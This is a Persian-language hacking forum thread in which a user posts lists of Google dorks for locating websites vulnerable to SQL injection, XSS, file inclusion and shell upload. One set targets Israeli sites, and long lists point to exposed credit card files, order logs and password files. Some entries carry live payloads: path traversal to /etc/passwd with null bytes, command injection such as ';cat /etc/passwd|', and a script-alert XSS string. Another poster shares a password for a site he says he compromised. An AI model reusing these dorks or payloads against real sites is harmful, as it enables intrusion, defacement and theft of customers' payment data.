بازم سلام...سلام...سلام!!
بازم دورک اومد با بوی اینجکت!!:84:
امروز واستون یه دورک های priv8 دیگه اماده کردم فکر کنم از چیزی که بود فراتر رفتم بیش تر از 20 تا گذاشتم./
خوب گفته بودم اگه روزانه حد اقل 10 تا تشکر داشته باشم دورک ها رو به 90 تا میرسونم./
اینم بگم امار تشکر خیلی پایینه این طور پیش بره دیگه دیگه...!./


xss and priv8 for special cms:
Dork: inurl:com_wordpress
wp-Dork: inurl:"/wp-content/plugins/count-per-day
Dork: inurl:com_preachit
Dork: inurl:/annonce/moteur-prix.php?categoriemoteur=
Dork: inurl:plugins/bp-gallery
Dork: inurl:plugins/wp-e-commerce/
Dork: inurl:plugins/o2s-gallery/
Dork: intext:"powered by Satellite"
Dork: inurl:"index.php?option=com_aclassif"
Dork: "Powered by ClipsterScript.com"
--------------------------------------------------------------------------------------------------------------
sql priv8 medium risk for special cms:
Dork: "Website design & hosting by Synthetix"
---------------------------------------------------------------------------------------------------------------
Sichkg CMS SQL Injection:
Dork: "Powered by sichkg.com"
---------------------------------------------------------------------------------------------------------------
Detna CMS SQL Injection
Dork: "Powerd by Detna"
----------------------------------------------------------------------------------------------------------------
Dork: "Powered by globi"
-----------------------------------------------------------------------------------------------------------------
Dork: intext:"A Channel Canada Production"
Dork: intext:"Desarrollo web realizado por Aciertaweb"
Dork: intext:"Site by MH1 Web Design"
----------------------------------------------------------------------------------------------------------------

dornica Cms SQL Injection Vulnerability
Dork: inurl:Powered And Designed By PersianSoft.org & powered by dornica
-----------------------------------------------------------------------------------------------------------------

alderneyweb CMS SQL Injection Vulnerability
Dork: intext:"Website by Alderney Web & IT Services"
-----------------------------------------------------------------------------------------------------------------

cinotas CMS SQL Injection Vulnerability
Dork: intext:"Website development and hosting by Cinotas Internet Solutions"
----------------------------------------------------------------------------------------------------------------

digilu CMS SQL Injection Vulnerability
Dork: intext:"Powered by: Digilu | web_technology"



تشکر فراموش نشه ها:73::73:

amirmahmood
07-08-2014, 02:06 PM
سلام دوستان!./
امیدوارم نماز و روزه هاتون مورد قبول درگاه حق واق بشه./

امروز براتون یه سری دورک shell upload امده کردند که نیاز به توضیح نداره استفاده کنید./
که بیش ترش واسه wordpress هست و توی plugin ها و themes ها یه و جود اومده./

برخی از دوستان پیام خصوصی داده بودند گفته بودند درک هایی که شما میزارید جواب نمیده باید بگم که این دورک ها رو خودم تست کردم و جدید هست و فقط روش های اینجکت فرق می کنه و روش هاش هنوز به صورت کامل pubick (عمومی)نشده./
prive 8 shell upload:64:

priv8 shell upload: #
#############################################
word press: #
inurl:/wp-content/plugins/reflex-gallery/ #
inurl:/wp-content/plugins/xerte-online/ #
inurl:/wp-content/plugins/uploader/ #
inurl:"wp-content/plugins/barclaycart" #
inurl:"wp-content/plugins/Premium_Gallery_Manager"/ #
inurl:/wp-content/themes/thecotton_v114/ #
inurl:"wp-content/themes/sixtees" #
inurl:wp-content/themes/ColdFusion/ #
inurl:themes/MoneyTheme/ OR #
inurl:wp-content/themes/MoneyTheme/ #
inurl:/wp-content/themes/curvo/ #
allintext: "Power by OpenSupports © 2009 - 2014. All #
#
############################################## #
e107: #
inurl:/e107_plugins/filemanager/ #
inurl:/e107_plugins/filedownload #
inurl:/e107_plugins/tap/ #
inurl:/e107_plugins/hupsi_share #
inurl:/e107_plugins/hupsi_fancybox #
inurl:/e107_plugins/hupsis_media_gallery/ #
inurl:/e107_plugins/radio_plan/ #
###############################################
other:
inurl:upload.asp intext:B2CPrint Online Printing Solutions
"Powered By JAKCMS"

babak00
07-10-2014, 04:10 PM
سلام دوستان منه یه سایت زدم پسورد یوزرش دارم به کنترول پنل دست پیدا کردم
ولئ رمز مئ زنم وارد نمئ شه و یگه دوباره اتصال کنید

passwd:RAHEEl1372
هرچئ مئ زنم وارد نمئ شه

amirmahmood
07-10-2014, 04:35 PM
دوست عزیز جای سوال شما اینجا نیست و پست شما اسپم محسوب میشه این تا پیک واسه گذاشتن دورک هست و به غیر از این اسپم./
لطفا پست خودتون رو اصلاح کنید و به جاش چند تا دورک بزارید تا بقیه استفاده کنند لطفا سوالتون رو در بخش تاپیک هکر های تازه وارد مطرح کنید و مطمن باشید که زود به جواب میرسد حالا چون پست من اسپم شمرده نشه خودم یه دونه دورک دیگه میزارم واسه iis./

allinurl:'POWERED BY IIS' & 'id='
:64:

babak00
07-10-2014, 05:07 PM
سلام
لطفا بکید این پسورد به کرک کردن نیاز داره

passwd:RAHEEl1372

رمز سایت اما وارد نمئ شه

amirmahmood
07-11-2014, 02:15 PM
خوب دوستان امروز براتون دورک عجیب واسه sql میزارم که هر وقت سرچ کنید همه یه سایت هایی که باگ sql دارند و اخرشون id= هست رو نشون بده./

inurl:.php & inurl:"id=":64:

amirmahmood
07-12-2014, 04:14 PM
سلام دوستان سری جدید دورک های sql هم رسید بزنید تو رگ که حال میده./:89:
سوالی داشتید در رابطه با دورک تو این تاپیک مطرح نکنید توی پ.خ بهم بدید جوابتون رو میدم./
امروز یه سری دورک واقعا عملی که عمرن تو هیچ جای انجمن گذاشته باشن میزارم ./

توجه!:دورک ها فقط مختص گوگل هست و در اونجا سرچ کنید./


اگر پستم مفید واقع شد بر روی تشکر واقع در پایین پست بنده کلیک کنید./thumbsup
ببخشید زیاد حرف زدم دورک ها رو میزارم:cool:./

sql injection priv8:
inurl:"/services.php?id="
inurl:"issue_list.php?uid= inurl:"/admin/upload.php"
intext:"hosting & design Centersite" inurl:".php?id="
inurl:"view-folder.php?fid="
inurl:"intext:website designed and developed by XRIX inurl:/newsdetails.php?newsid="
####################################
php-nuke sql:
inurl:"modules.php?op=" & "name=Web_Links"
####################################
intext:"Design and Developed by weblogic" inurl:"php?"
intext:"design by xedum" inurl:"php?id"
intext:"powered by StarSystem IT " inurl:"id"
intext:"Web Development: Matrix10.net" inurl:"id"
intext:"zbbiz.com" inurl:"php?"
powered by innochange"
inurl:index.php?CID=
inurl:loadNews.php?newsId=
inurl:fa/inpage.php?did=
inurl:blog/blog.php?blogId=1 inurl:categoryId=
inurl:"single.php?url=" video|
inurl:album.php?id= + pi.gov.br


intext:Powered by Real Estate Israel BMBY
inurl:wp-content/plugins/proplayer/playlist-controller.php?id=

amirmahmood
07-12-2014, 04:30 PM
دوستان اینم قسمت جدید ./

"Site by cdeVision" "inurl:students.php?id="
Website designed & developed by PCVmedia.com" "inurl:free_gallery.php?cat_id="
"Diseno Web:SAY Comunicacion" "inurl:producto.php?id="
"QOLQA" "inurl:categoria.php?id="
"Powered By Amigot Corp" "inurl:story.php?id="
################################################## #####
inurl:viewItem.php?id=
"Powered by:SEO New York" "inurl:prod.php?id"
inurl:news-item.php?id="
"inurl:picture.php?gid="
"Graphic design & Website design by Kimia" "inurl:id="
"inurl:display-section.php?id="
inurl:"submitticket.phpâ??"â??
inurl:"/ac-admin/index.php"
################################################## #####
site:.pk intext:"Designed & Developed By: DL TECH" inurl:".php?"
inurl:"/dj-classifieds/"
inurl:"/page.php?IDMenu="
"Website Production by Nyman Signs" inurl:id=
inurl:beats.php?gid=
"Site Design by Iron Lava Corp." inurl:index.php?pid=
################################################## #####
intext:"Powered By VisionNet" filetype:asp
intext:"Powered by WHMCS"
inurl:webboard.php?option=answers
################################################## #####

amirmahmood
07-12-2014, 05:13 PM
به نام اولین برنامه نویس هستیheart
خوب دوستان این سری براتون هم xss هم sql گذاشتم./
اینم بگم امار حمایت پایین اومده ها:redface:./


xss
priv8
dorks for all of member of ashiyane
##############################################
inurl:index.php?option=com_beacondecode
inurl:index.php?option=com_wrapper
intext:"powered by netlinks" site:af
"inurl:index.php?ind="
inurl:"/webinar_detail.php?id="
##############################################
sql
priv8
dorks for all of member of ashiyane
##############################################
"inurl:ricetta.php?id="
"inurl:prodotto.php?id="
"inurl:news-dettaglio.php?id="
allinurl:"detail.php?input="
inurl:profile.php?id=
inurl:index.php?option=com_n-myndir
inurl:index.php?option=com_ahsshop
inurl:".asp?ID=" intext:"design by buchanan solutions"
"inurl:prodotto.php?lang="
inurl:index.php?option=com_radio
"inurl:index.php?ind="
inurl:inc_securedocumentlibrary.asp
inurl:"/category_products.php?cid="
inurl:"/index.php?option=com_some"
inurl:"/index.php?option=com_car"
inurl:"/index.php?option=com_sanpham"
inurl:"driver.php?langue="
inurl:index.php?option=com_enmasse
inurl:"/index.php?option=com_niceajaxpoll"
inurl:index.php?option=com_odudeprofile
inurl:"main.php?filename="
inurl:i.php?mid=

amirmahmood
07-12-2014, 07:08 PM
سلام دوباره./
دوستان ب خاطر این که امار حمایت ها کم بود تعداد دورک ها گذاشته شده کاهش یافت./

از این به بعد دورک روزانه بین 5 الی 15 میزارم./
اگر امار حمایت ها همین امروز بره بالا براتون فرداش 90 تا دورک میزارم./
من نمیدونم چرا طرفداری نمیکنید...دورک ها رو خودم همشون رو تست می کنم...!!!!!!!!



خوب شروع میکنیم با یک دورک برای باگ rsi مخفف باگ remote sql injection./


امروز یه خورده در مورد این باگ میزارم./



دقیقا 90 درصد مثل همون sql injection خودمون هست./


خوب این هم دورکا./



inurl:detalhes.php?id=
inurl:?products.php?p_id?
inurl:"com_cartweberp
Design by Tagfa Co


خوب دوستان فردا هم یه سری دورک جدید میزارم امیدورام که خوشتون بیاد واستفاده کافی رو ببرید./


موفق باشید./

amirmahmood
07-16-2014, 12:07 PM
سلام دوستان./
ببخشید ی دو سه روزی دورک نمیزاشتم./

بالاخره تصمیم بر ان گرفتم که دیگه دورک کم تر در رابطه با sql و xss./




امروز یه سری دورک جدید در رابطه با lfi (local file inclusion) براتون گذاشتم ازم حمایت کنید دورک های جدید و بیش تری میزارم./
خوب شروع می کنیم


lfi:


lfi:
------------------------------------------------------
all of this with inurl OR allinurl:
-------------------------------------------------------

agb.php?lang=
angemeldet.php?lang=
anmelden.php?lang=
charts.php?lang=
external_vote.php?lang=
guestbook.php?lang=
impressum.php?lang=
index.php?lang=
rss-reader.php?lang=
/statistic.php?lang=
teilnehmer.php?lang=
topsites.php?lang=
/votecode.php?
external_vote.php?l_vote_done=
/winner.php?lang=
/voting.php?lang=
dispatch.php?atknodetype=
/_center.php?page=
index.php?load=
phpmyadmin.css.php?GLOBALS
cmd.php?cmd=
admin.php?module=
assets/js/htcmime.php?file=

amirmahmood
07-16-2014, 03:27 PM
سلام دوستان./


اینم دورک sql برای هک سایت های اسراییلی امیدوارم لذت ببرید./

intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il

amirmahmood
07-16-2014, 03:33 PM
بازم دورک اوردم./
اینبار دورک برای cms e107 سرچ کنید./
لذت ببرید./
پابلیکش کنید./


/contact.php “news.php?extend” site:.ua
page.php?5 site:.ru
“e107_plugins”
“email.php?news.2″
admin.php Registered members
page.php?11 Link Categories
page.php?11 Game Tracker Banner
news.php?item. A Tribute to Insanity!
news.php?item. update!
news.php?cat. Archive
signup.php?resend Courriel d’enregistrement
download.php?list. Forms
download.php?list. Articles
content.php?cat. Articles
page.php?10 Join
autogallery.php Auto Gallery e107_plugins
page.php?4 About Me
gsitemap.php?show Sitemap
submitnews.php Submit News Item
Contact Details
page.php?8
page.php?8 vds
page.php?8 tbr
page.php?8 aoew
page.php?8 bri
page.php?8 vsn
content.php?content.34
page.php?8 r4k
page.php?8 bkd
page.php?5 recend pages
“links.php?cat.5″
download.php?cat.edit.999999
“/my_gallery.php?gallery=Gallery/*”
/contact.php “news.php?extend” site:.ua

amirmahmood
07-16-2014, 04:44 PM
سلام دوستان./
امروز داشتم همینجوری تو نت میچرخیدم که چشم خور به یک لیست از دورک credit دوستان امتحان کنید همشون mega هستند./

این دورک ها رو از سایت ها مختلف جمع اوزی کردم و خیلی هم زیاد هست پس تصمیم گرفتم تو چند قسمت بزارم./

دوستان لطفا تو رو خدا حمایت کنید./

اینم بگم دوستانی که می خوان همکاری کنن به یوزر من پیام بدن./:cool:

خوب دیگه دورک ها رو میزارم

#/+comersus/database/comersus.mdb
#/+comersus/store/comersus.mdb
#/../../cart32.mdb
#//comersus.mdb
#//comersus/comersus.mdb
#//comersus/database/comersus.mdb
#//database/comersus.mdb
#//shop/
#//shop/?M=A
#//store/
#//store/?M=A
#//store/comersus.mdb
#//store/comersus/comersus.mdb
#//store/comersus/database/comersus.mdb
#//store/database/comersus.mdb
#/ASP/cart/
#/ASP/cart/database/
#/ASP/cart/database/metacart.mdb
#/Bin/cart.pl
#/Bin/cartmanager.cgi
#/Cgi-Bin/cart.pl
#/Cgi-Bin/cartmanager.cgi
#/Cgi/cartmanager.cgi
#/Cybercash/smps*.../merchants/admin.pw
#/DC/Auth_data/auth_user_file.txt
#/DC/Orders/orders.txt
#/DC/auth_data/auth_user_file.txt
#/DC/orders/orders.txt
#/DCShop/Auth_data/auth_user_file.txt
#/DCShop/Orders/orders.txt
#/DCShop/auth_data/auth_user_file.txt
#/DCShop/dcshop_admin.cgi
#/DCShop/orders/orders.txt
#/MIDICART/midicart.mdb
#/Merchant2/
#/Merchant2/INSTALL.txt
#/Merchant2/admin.mv
#/Merchant2/database/
#/Merchant2/modules/
#/ORDERS
#/ORDERS/
#/Orders/
#/Orders/order.log
#/Orders/order_log.dat
#/Orders/order_log_v12.dat
#/Orders/orders.txt
#/Oscommerce/catalog/
#/Oscommerce/catalog/admin/
#/Oscommerce/catalog/admin/orders.php
#/Osecommerce/
#/Osecommerce/admin/
#/Osecommerce/admin/admin/
#/Osecommerce/admin/admin/includes/
#/Osecommerce/admin/admin/includes/functions/
#/Osecommerce/admin/admin/includes/functions/database.php
#/PDG/cvv2.txt
#/PDG/order.txt
#/PDG_Cart
#/PDG_Cart/
#/PDG_Cart/authorizenet.txt
#/PDG_Cart/authorizenets.txt
#/PDG_Cart/cc.txt
#/PDG_Cart/oder.log
#/PDG_Cart/order.log
#/PDG_Cart/shopper.conf
#/PDG_Cart/shopper.config
#/PTSC/db/PTSC.mdb
#/ProcuctCart/pc/pcadmin/
#/ProdctCart/pcadmin/
#/ProductCart/database/EIPC.mdb
#/ProductCart/pc/admin
#/Sales_files/
#/Shop/Shop.sql
#/Shop/info.dat
#/Shop/orders.in
#/Shop/track.db
#/ShopCart2.mdb
#/ShoppingCart/cart.jsp
#/ShoppingCart/orders.inc
#/SiteServer/Admin/
#/SiteServer/Admin/commerce/foundation/DSN.asp
#/SiteServer/Admin/commerce/foundation/domain.asp
#/SiteServer/Admin/commerce/foundation/driver.asp
#/SiteServer/Admin/knowledge/dsmgr/default.asp
#/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
#/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
#/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
#/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
#/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
#/SiteServer/Admin/knowledge/persmbr/vs.asp
#/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
#/SiteServer/Publishing/
#/SiteServer/Publishing/ViewCode.asp
#/SiteServer/Publishing/viewcode.asp
#/SiteServer/admin/
#/SiteServer/admin/findvserver.asp
#/SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPasswor d_1
#/Store/admin/Default.asp
#/Store/orders.inc
#/StoreAdmin
#/StoreAdmin/
#/StoreDB
#/StoreDB/
#/WebShop
#/WebShop/
#/WebShop/logs/
#/WebShop/logs/cc.txt
#/WebShop/logs/ck.log
#/WebShop/templates/cc.txt
#/Web_Store
#/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
#/Web_store
#/Web_store/
#/Web_store/Admin_files/
#/Web_store/web_store.cgi?page=../../../../../../../../etc/passw
#/Webshop*
#/Webshop/
#/Webshop/*
#/Webstore/
#/_database/shopping400.mdb
#/_private/shopping_cart.mdb
#/_vti_cnf/order.log
#/_vti_cnf/order.txt
#/acart.mdb
#/acart2.mdb
#/acart20.mdb
#/acart2_0.mdb
#/acart2_0/acart2_0.mdb
#/acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=
#/acart2_0/admin/index.asp?msg=
#/acart2_0/deliver.asp?msg=
#/acart2_0/error.asp?msg=
#/acart2_0/signin.asp?msg=
#/acartpath/signin.asp
#/admin/acart.mdb
#/admin/acart2.mdb
#/admin/acart20.mdb
#/admin/acart2_0.mdb
#/admin/apstore.mdb
#/admin/cart.cgi
#/admin/cgi-bin/.../card.csv
#/admin/cgi-bin/.../card.log
#/admin/cgi-bin/.../card.txt
#/admin/credit_card_info.php
#/admin/customers.csv
#/admin/customers.xls
#/admin/my_customer_base.asp
#/admin/order.dat
#/admin/orders.asp
#/admin/orders.dat
#/admin/orders.php
#/admin/orders/
#/admin/sales.csv
#/admin/sales.xls
#/admin/shop-dat.dat
#/admin/shop_login.htm
#/admin_files/order.log
#/allinurl/comersus/database/comersus.mdb
#/apstore.mdb
#/apstore/apstore.mdb
#/ashopKart20/admin.asp
#/ashopKart20/admin/scart.mdb
#/ashopKart20/scart.mdb
#/ashopkart20+-+ashoptkart20/admin
#/aspcart5.mdb
#/authorize.csv
#/authorize/dbmfiles/users
#/authorizenet.cgi
#/authorizenet.log
#/authorizenets.old
#/backoffice
#/backoffice+
#/backoffice+/
#/backoffice/
#/backoffice/customers.csv
#/backoffice/customers.xls
#/backoffice/index.asp
#/backoffice/login.jsp
#/backoffice/sales.csv
#/backoffice/sales.xls
#/backofficegold
#/backofficegold/
#/backofficegold/customers.csv
#/backofficegold/customers.xls
#/backofficegold/sales.csv
#/backofficegold/sales.xls
#/backofficelite

amirmahmood
07-16-2014, 04:59 PM
دوستان اینم قسمت جدید ./
این دورک ها کلا مجموعه اش عظیم و کاملا عملی./

قسمت بعدی رو هم گذاشتم./

#/backofficelite/
#/backofficelite/customers.csv
#/backofficelite/customers.xls
#/backofficelite/default.asp
#/backofficelite/sales.csv
#/backofficelite/sales.xls
#/bill
#/billing
#/billing.nsf
#/billing/
#/billing/anyweb0001.htm
#/billing/billing.apw
#/billing/billing.swf
#/billpay/
#/bills
#/bin/DCShop/auth_data/auth_user_file.txt
#/bin/DCShop/orders/orders.txt
#/bin/cart.pl
#/bin/cartmanager.cgi
#/bin/netbilling/
#/bin/netbilling/.dbusers.db
#/bin/netbilling/.htaccess
#/bin/netbilling/.htpasswd
#/bin/netbilling/.htusers
#/bin/netbilling/.passwrd
#/bin/netbilling/WS_FTP.LOG
#/bin/netbilling/crontab.txt
#/bin/netbilling/expire.txt
#/bin/netbilling/htusers
#/bin/netbilling/robots.txt
#/bin/orders/orders.txt
#/bin/shop/auth_data/auth_user_file.txt
#/bin/shop/orders/orders.txt
#/bin/webcash/
#/bin/webcash/.dbusers.db
#/bin/webcash/.htaccess
#/bin/webcash/.htpasswd
#/bin/webcash/.htusers
#/bin/webcash/.passwrd
#/bin/webcash/WS_FTP.LOG
#/bin/webcash/crontab.txt
#/bin/webcash/expire.txt
#/bin/webcash/htusers
#/bin/webcash/robots.txt
#/bookstore/
#/bookstore/shop.mdb
#/bookstore/shopping.mdb
#/card.csv
#/card.log
#/card.txt
#/card/
#/cards/
#/cart
#/cart.cgi
#/cart.pl
#/cart/
#/cart/cart.cgi
#/cart/dealers/
#/cart/dealers/Copy of sql/
#/cart/dealers/Review-Correct.php
#/cart/dealers/Review-Corrects.php
#/cart/dealers/_notes/
#/cart/dealers/enter-order.php
#/cart/dealers/php.php
#/cart/dealers/review-orderAT.php
#/cart/dealers/table-test.htm
#/cart/dealers/untitled/
#/cart/dealers/yes-noas.php
#/cart/dealers/yes-noas2.php
#/cart/file-scripts/
#/cart/file-scripts/_notes/
#/cart/file-scripts/file-lesson-1.html
#/cart/file-scripts/file-lesson-2.html
#/cart/file-scripts/file-lesson-3.html
#/cart/file-scripts/file-perm.php
#/cart/file-scripts/is-readable.htm
#/cart/file-scripts/temp-file.htm
#/cart/file-scripts/test.txt
#/cart/file-scripts/write-to-a.php
#/cart32.exe
#/cart32.mdb
#/cartcart.cgi
#/cartman.php
#/cartman.php?action=add&id=../../../etc/passwd
#/cartman.php?action=add&id=1&descr=1=1&quantity=1
#/cartman.php?action=add&id=1001&descr=MS%20Office%2 02000&price=119&quantity=1
#/cartmanager.cgi
#/cash/
#/catalog/
#/catalog/admin/
#/catalog/admin/orders.php
#/cbi-bin/shop/
#/cc.csv
#/cc.log
#/cc.txt
#/ccard
#/ccard/
#/ccards/
#/ccv.csv
#/ccv.log
#/ccv.txt
#/cgi-bin-shop/
#/cgi-bin/.../authorize.csv
#/cgi-bin/.../authorize.cvs
#/cgi-bin/.../authorizenet.log
#/cgi-bin/.../authorizenets.old
#/cgi-bin/.../card.csv
#/cgi-bin/.../card.log
#/cgi-bin/.../card.txt
#/cgi-bin/.../cc.csv
#/cgi-bin/.../cc.log
#/cgi-bin/.../cc.txt
#/cgi-bin/.../ccv.csv
#/cgi-bin/.../ccv.log
#/cgi-bin/.../ccv.txt
#/cgi-bin/.../cvv.csv
#/cgi-bin/.../cvv.log
#/cgi-bin/.../cvv.txt
#/cgi-bin/.../cvv2.csv
#/cgi-bin/.../cvv2.log
#/cgi-bin/.../cvv2.txt
#/cgi-bin/.../order.csv
#/cgi-bin/.../order.log
#/cgi-bin/.../order.txt
#/cgi-bin/.../orders.txt
#/cgi-bin/.../shopper.conf
#/cgi-bin/DCShop/Auth_data/auth_user_file.txt
#/cgi-bin/DCShop/Orders/orders.txt
#/cgi-bin/DCShop/auth_data/auth_user_file.txt
#/cgi-bin/DCShop/dcprotect.pl
#/cgi-bin/DCShop/dcshop_admin.cgi
#/cgi-bin/DCShop/dcshop_admin.setup
#/cgi-bin/DCShop/orders/orders.txt
#/cgi-bin/DCShopAuth_data/auth_user_file.txt
#/cgi-bin/OrderForm.cgi
#/cgi-bin/Orders/orders.txt
#/cgi-bin/PDG
#/cgi-bin/PDG_Cart/mc.txt
#/cgi-bin/PDG_Cart/order.log
#/cgi-bin/PDG_cart/card.txt
#/cgi-bin/Web_Store/web_store.cgi
#/cgi-bin/Web_Store/web_store.cgi?page=%00
#/cgi-bin/Web_Store/web_store.cgi?page=../../../path/filename%00ext
#/cgi-bin/Web_store/web_store.cgi
#/cgi-bin/authorizenet.cgi/
#/cgi-bin/cart.pl
#/cgi-bin/cart.pl?db
#/cgi-bin/cart.pl?db='
#/cgi-bin/cart.pl?env
#/cgi-bin/cart.pl?path
#/cgi-bin/cart.pl?vars
#/cgi-bin/cart/
#/cgi-bin/cart/cart.pl?path
#/cgi-bin/cart/cart.pl?vars
#/cgi-bin/cart/pending.dat
#/cgi-bin/cart/vars.dat
#/cgi-bin/cart32.exe
#/cgi-bin/cart32.exe/error
#/cgi-bin/cart32.exe/expdate
#/cgi-bin/cart32.mdb
#/cgi-bin/cart32/
#/cgi-bin/cart32/tempfiles.list
#/cgi-bin/cartmanager.cgi
#/cgi-bin/comersus/store/database/comersus.mdb
#/cgi-bin/comersus/store/shopadmin1.asp
#/cgi-bin/commerce.cgi
#/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
#/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
#/cgi-bin/commerce.cgi?page=../../../../etc/paswd%00index.html
#/cgi-bin/commerce.cgi?page=check
#/cgi-bin/conf/merchant_conf
#/cgi-bin/config/datasources/myorder.mdb
#/cgi-bin/cybercash-3.2/conf/merchant_conf
#/cgi-bin/cybercash/
#/cgi-bin/cybercash/conf/merchant_conf
#/cgi-bin/dcshop.cgi
#/cgi-bin/dcshop/Auth_data/auth_user_file.txt
#/cgi-bin/dcshop/Orders/orders.txt
#/cgi-bin/dcshop/auth_data/auth_user_file.txt
#/cgi-bin/dcshop/orders/orders.txt
#/cgi-bin/e-cart
#/cgi-bin/e-cart/cart.txt
#/cgi-bin/ecommerce/
#/cgi-bin/ecommerce/passwords
#/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
#/cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|
#/cgi-bin/eshop.pl?seite=;ls|
#/cgi-bin/eurodebit/data/.htpasswd
#/cgi-bin/ezmall2000/mall2000.cgi
#/cgi-bin/ezmall2000/mall2000.cgi?page=../../../../../../../bin/comando%20/diretorio/00.html%7c
#/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
#/cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt
#/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
#/cgi-bin/ezshopper2/loadpage.cgi
#/cgi-bin/ezshopper2/loadpage.cgi?+//
#/cgi-bin/ezshopper2/loadpage.cgi?id+/
#/cgi-bin/ezshopper2/loadpage.cgi?id+/subdiretorio/
#/cgi-bin/ezshopper3/loadpage.cgi
#/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/
#/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=//
#/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
#/cgi-bin/i-shop/
#/cgi-bin/i-shop/admin/store.log
#/cgi-bin/i-shop/admin/store_user_lib.pl
#/cgi-bin/i-shopEire/admin/store.log
#/cgi-bin/i-shopSale/admin/store.log
#/cgi-bin/i-shoppro/
#/cgi-bin/i-shoppro/admin/store.log
#/cgi-bin/ibill
#/cgi-bin/ibill/
#/cgi-bin/ibill/.htpasswd
#/cgi-bin/ibill/mypasswd/.memberfile
#/cgi-bin/ibillpm.pl
#/cgi-bin/ibll
#/cgi-bin/ibll.log
#/cgi-bin/mall2000.cgi
#/cgi-bin/msbill
#/cgi-bin/msbill.log
#/cgi-bin/msbilllog.txt
#/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
#/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w
#/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
#/cgi-bin/netbilling
#/cgi-bin/netbilling/
#/cgi-bin/netbilling/.dbusers.db
#/cgi-bin/netbilling/.htaccess
#/cgi-bin/netbilling/.htpasswd
#/cgi-bin/netbilling/.htusers
#/cgi-bin/netbilling/.passwrd
#/cgi-bin/netbilling/WS_FTP.LOG
#/cgi-bin/netbilling/crontab.txt
#/cgi-bin/netbilling/expire.txt
#/cgi-bin/netbilling/htusers
#/cgi-bin/netbilling/robots.txt
#/cgi-bin/order
#/cgi-bin/order.cgi
#/cgi-bin/order.dat
#/cgi-bin/order.db
#/cgi-bin/order.log
#/cgi-bin/order.mdb
#/cgi-bin/order.txt
#/cgi-bin/order1.log
#/cgi-bin/orderinfo.txt
#/cgi-bin/orderlog.txt
#/cgi-bin/orders.dat
#/cgi-bin/orders.log
#/cgi-bin/orders.mdb
#/cgi-bin/orders.txt
#/cgi-bin/orders/
#/cgi-bin/orders/*.olf
#/cgi-bin/orders/1001.1.log
#/cgi-bin/orders/cc.txt
#/cgi-bin/orders/mc.txt
#/cgi-bin/orders/orders
#/cgi-bin/orders/orders.txt
#/cgi-bin/orders/orders/
#/cgi-bin/orders/track.db
#/cgi-bin/payment.mart
#/cgi-bin/paypal.cgi
#/cgi-bin/paypal/
#/cgi-bin/paypal/command
#/cgi-bin/paypal/test.txt
#/cgi-bin/paypal/test2.txt
#/cgi-bin/paypal/test3.txt
#/cgi-bin/paypal/test4.txt
#/cgi-bin/pdg_cart/order.csv
#/cgi-bin/perlshop.cgi
#/cgi-bin/quikstore.cgi
#/cgi-bin/quikstore.cgi?page=../../../../../../../etc/passwd%00.html&cart_id=
#/cgi-bin/quikstore.cgi?page=../orders/%00html&cart_id=
#/cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
#/cgi-bin/quikstore.cgi?page=orders/%00html&cart_id=
#/cgi-bin/quikstore.cgi?store='
#/cgi-bin/scripts/cart.pl
#/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
#/cgi-bin/scripts/cart.pl?env
#/cgi-bin/scripts/cart.pl?vars
#/cgi-bin/secure/orders
#/cgi-bin/secure/orders/
#/cgi-bin/shop-dat.dat
#/cgi-bin/shop.cgi
#/cgi-bin/shop.cgi/page=../../../../etc/hosts
#/cgi-bin/shop.cgi/page=../../../../etc/passwd
#/cgi-bin/shop.log
#/cgi-bin/shop.pl
#/cgi-bin/shop.pl/page=../../../../etc/passwd
#/cgi-bin/shop.pl?page=xxx
#/cgi-bin/shop/Auth_data/auth_user_file.txt
#/cgi-bin/shop/Orders/orders.txt
#/cgi-bin/shop/auth_data/auth_user_file.txt
#/cgi-bin/shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
#/cgi-bin/shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
#/cgi-bin/shop/info.dat
#/cgi-bin/shop/orders/orders.txt
#/cgi-bin/shop/pgp_encrypt/cc_store_lib.pm
#/cgi-bin/shop/pgp_encrypt/order_admin.cgi
#/cgi-bin/shop/pgp_encrypt/pgp_lib.pm
#/cgi-bin/shop/pgp_encrypt/print_invoice.cgi
